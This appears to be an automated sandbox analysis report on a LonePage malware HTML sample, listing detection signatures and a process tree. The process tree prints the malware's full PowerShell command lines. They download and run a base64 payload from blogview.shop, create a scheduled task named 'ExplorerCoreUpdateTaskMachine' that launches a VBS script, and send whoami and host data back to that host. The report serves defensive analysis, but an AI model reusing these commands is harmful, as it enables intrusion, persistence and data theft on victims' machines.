Edit tour
Windows
Analysis Report
g3Wg5cdIcT.html
Overview
General Information
Sample name: | g3Wg5cdIcT.htmlrenamed because original name is a hash value |
Original sample name: | 5eb234197e492e5377ef7b31274ca12d19ebea70b8832e4883be06eaa06e379f.html |
Analysis ID: | 1542807 |
MD5: | e839a71f05316103f6ffdf1916173a95 |
SHA1: | 4016963fcc0b2a65afaa80e9058289ca020139e6 |
SHA256: | 5eb234197e492e5377ef7b31274ca12d19ebea70b8832e4883be06eaa06e379f |
Tags: | blogview-shophtmluser-JAMESWT_MHT |
Infos: | |
Detection
LonePage
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download payload from hardcoded c2 list
Yara detected LonePage
Bypasses PowerShell execution policy
Detected javascript redirector / loader
Downloads suspicious files via Chrome
Found suspicious ZIP file
Found suspicious powershell code related to unpacking or dynamic code loading
HTML page contains base64 encoded files
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious Javascript code found in HTML file
Suspicious execution chain found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTML body contains password input but no form action
HTML title does not match URL
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- chrome.exe (PID: 3812 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed "C:\Us ers\user\D esktop\g3W g5cdIcT.ht ml" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 5824 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2068 --fi eld-trial- handle=198 0,i,962008 3289215155 752,129963 9315297191 9094,26214 4 /prefetc h:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - unarchiver.exe (PID: 5160 cmdline:
"C:\Window s\SysWOW64 \unarchive r.exe" "C: \Users\use r\Download s\748-929- 24.zip" MD5: 16FF3CC6CC330A08EED70CBC1D35F5D2) - 7za.exe (PID: 4068 cmdline:
"C:\Window s\System32 \7za.exe" x -pinfect ed -y -o"C :\Users\us er\AppData \Local\Tem p\jq2oycxc .wmp" "C:\ Users\user \Downloads \748-929-2 4.zip" MD5: 77E556CDFDC5C592F5C46DB4127C6F4C) - conhost.exe (PID: 2920 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 6152 cmdline:
"cmd.exe" /C "C:\Use rs\user\Ap pData\Loca l\Temp\jq2 oycxc.wmp\ 748-929-24 .html.lnk" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1396 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1436 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" powershell .exe -w hi dden -nop -noni -exe c bypass - c $w=new-o bject syst em.net.web client;$d= $w.downloa dstring('h ttps://blo gview.shop /api/value s/view/748 -929-24.tx t'); $dd = [System.C onvert]::F romBase64S tring($d); [System.IO .File]::Wr iteAllByte s($home+'\ appdata\lo cal\temp\7 48-929-24. html', $dd );&$home\a ppdata\loc al\temp\74 8-929-24.h tml;$a='ZG ltIHIsIGMK c2V0IHIgPS BjcmVhdGVv YmplY3QoIl dTY3JpcHQu U2hlbGwiKQ pjID0gInBv d2Vyc2hlbG wuZXhlIC1l eGVjdXRpb2 5wb2xpY3kg YnlwYXNzIC 13IGhpZGRl biAtbm9wcm 9maWxlIC1j IHN0YXJ0LX NsZWVwIDM5 O3N0YXJ0LX NsZWVwIChn ZXQtcmFuZG 9tIC1taW4g NSAtbWF4ID QzKTtzdGFy dC1zbGVlcC AxMTskaWlr PW5ldy1vYm plY3QgbmV0 LndlYmNsaW VudDskcmMg PSAtam9pbi AoKDQ4Li41 NykgfCBnZX QtcmFuZG9t IC1jb3VudC ggZ2V0LXJh bmRvbSAtbW luIDUgLW1h eCAxNSkgfC Bmb3JlYWNo LW9iamVjdC B7IFtjaGFy XSRffSkgKy AnLnR4dCc7 JGZsbT0kaW lrLmRvd25s b2FkZGF0YS gnaHR0cHM6 Ly9ibG9ndm lldy5zaG9w L2FwaS92YW x1ZXMvMzgz MDM1MjkxND M0MzgxOTkx NzEvcmVmcm VzaDE5OS8n KyRyYyk7aW YoJGZsbS5M ZW5ndGggLW d0IDEpeyRq a3I9W3N5c3 RlbS50ZXh0 LmVuY29kaW 5nXTo6dXRm OC5nZXRTdH JpbmcoJGZs bSk7aWYoJG prciAtbWF0 Y2ggJ2dldC 1jb250ZW50 Jyl7W2J5dG VbXV0gJGRy cHk9SUVYIC Rqa3I7fWVs c2V7JGJqZG 89d2hvYW1p OyRiamRvKz 0nPT0nOyRi amRvKz1bU3 lzdGVtLk5l dC5EbnNdOj pHZXRIb3N0 QWRkcmVzc2 VzKCRpcCkr W1N5c3RlbS 5FbnZpcm9u bWVudF06Ok 5ld0xpbmU7 JGhibj1JRV ggJGprcjsk Ympkbys9JG hibnxPdXQt c3RyaW5nO1 tieXRlW11d JGRycHk9W3 N5c3RlbS50 ZXh0LmVuY2 9kaW5nXTo6 VXRmOC5HZX RCeXRlcygk Ympkbyk7fT tzdGFydC1z bGVlcCAxMD skdWprPW5l dy1vYmplY3 QgbmV0Lndl YmNsaWVudD tzdGFydC1z bGVlcCAxNj skdWprLnVw bG9hZGRhdG EoJ2h0dHBz Oi8vYmxvZ3 ZpZXcuc2hv cC9hcGkvdm FsdWVzL3Jl ZnJlc2gxOT knLCRkcnB5 KTt9IgpyLl J1biBjLCAw LCBmYWxzZQ ==';$b=[Sy stem.Conve rt]::FromB ase64Strin g($a);$c=[ System.Tex t.Encoding ]::utf8.Ge tString($b );set-cont ent C:\Use rs\Public\ Libraries\ Libraries. vbs -value $c;schtas ks.exe /cr eate /TN E xplorerCor eUpdateTas kMachine / SC minute /mo 3 /tr C:\Users\P ublic\Libr aries\Libr aries.vbs /f; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - powershell.exe (PID: 5536 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w hidden -nop -noni -exec byp ass -c =ne w-object s ystem.net. webclient MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - chrome.exe (PID: 3380 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t C:\Users \user\appd ata\local\ temp\748-9 29-24.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 2612 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2044 --fi eld-trial- handle=200 0,i,120768 6037740753 2846,44557 4052190834 6531,26214 4 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction /p refetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - schtasks.exe (PID: 5692 cmdline:
"C:\Window s\system32 \schtasks. exe" /crea te /TN Exp lorerCoreU pdateTaskM achine /SC minute /m o 3 /tr C: \Users\Pub lic\Librar ies\Librar ies.vbs /f MD5: 48C2FE20575769DE916F48EF0676A965)
- wscript.exe (PID: 6488 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\Public\L ibraries\L ibraries.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 2448 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -execution policy byp ass -w hid den -nopro file -c st art-sleep 39;start-s leep (get- random -mi n 5 -max 4 3);start-s leep 11;$i ik=new-obj ect net.we bclient;$r c = -join ((48..57) | get-rand om -count( get-rando m -min 5 - max 15) | foreach-ob ject { [ch ar]$_}) + '.txt';$fl m=$iik.dow nloaddata( 'https://b logview.sh op/api/val ues/383035 2914343819 9171/refre sh199/'+$r c);if($flm .Length -g t 1){$jkr= [system.te xt.encodin g]::utf8.g etString($ flm);if($j kr -match 'get-conte nt'){[byte []] $drpy= IEX $jkr;} else{$bjdo =whoami;$b jdo+='=='; $bjdo+=[Sy stem.Net.D ns]::GetHo stAddresse s($ip)+[Sy stem.Envir onment]::N ewLine;$hb n=IEX $jkr ;$bjdo+=$h bn|Out-str ing;[byte[ ]]$drpy=[s ystem.text .encoding] ::Utf8.Get Bytes($bjd o);};start -sleep 10; $ujk=new-o bject net. webclient; start-slee p 16;$ujk. uploaddata ('https:// blogview.s hop/api/va lues/refre sh199',$dr py);} MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 4984 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 764 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\Public\L ibraries\L ibraries.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 6824 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -execution policy byp ass -w hid den -nopro file -c st art-sleep 39;start-s leep (get- random -mi n 5 -max 4 3);start-s leep 11;$i ik=new-obj ect net.we bclient;$r c = -join ((48..57) | get-rand om -count( get-rando m -min 5 - max 15) | foreach-ob ject { [ch ar]$_}) + '.txt';$fl m=$iik.dow nloaddata( 'https://b logview.sh op/api/val ues/383035 2914343819 9171/refre sh199/'+$r c);if($flm .Length -g t 1){$jkr= [system.te xt.encodin g]::utf8.g etString($ flm);if($j kr -match 'get-conte nt'){[byte []] $drpy= IEX $jkr;} else{$bjdo =whoami;$b jdo+='=='; $bjdo+=[Sy stem.Net.D ns]::GetHo stAddresse s($ip)+[Sy stem.Envir onment]::N ewLine;$hb n=IEX $jkr ;$bjdo+=$h bn|Out-str ing;[byte[ ]]$drpy=[s ystem.text .encoding] ::Utf8.Get Bytes($bjd o);};start -sleep 10; $ujk=new-o bject net. webclient; start-slee p 16;$ujk. uploaddata ('https:// blogview.s hop/api/va lues/refre sh199',$dr py);} MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 4788 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_LonePage | Yara detected LonePage | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_LonePage | Yara detected LonePage | Joe Security | ||
JoeSecurity_LonePage | Yara detected LonePage | Joe Security | ||
JoeSecurity_LonePage | Yara detected LonePage | Joe Security | ||
JoeSecurity_LonePage | Yara detected LonePage | Joe Security | ||
JoeSecurity_LonePage | Yara detected LonePage | Joe Security | ||
Click to see the 16 entries |
Spreading |
---|
Source: | Author: Joe Security: |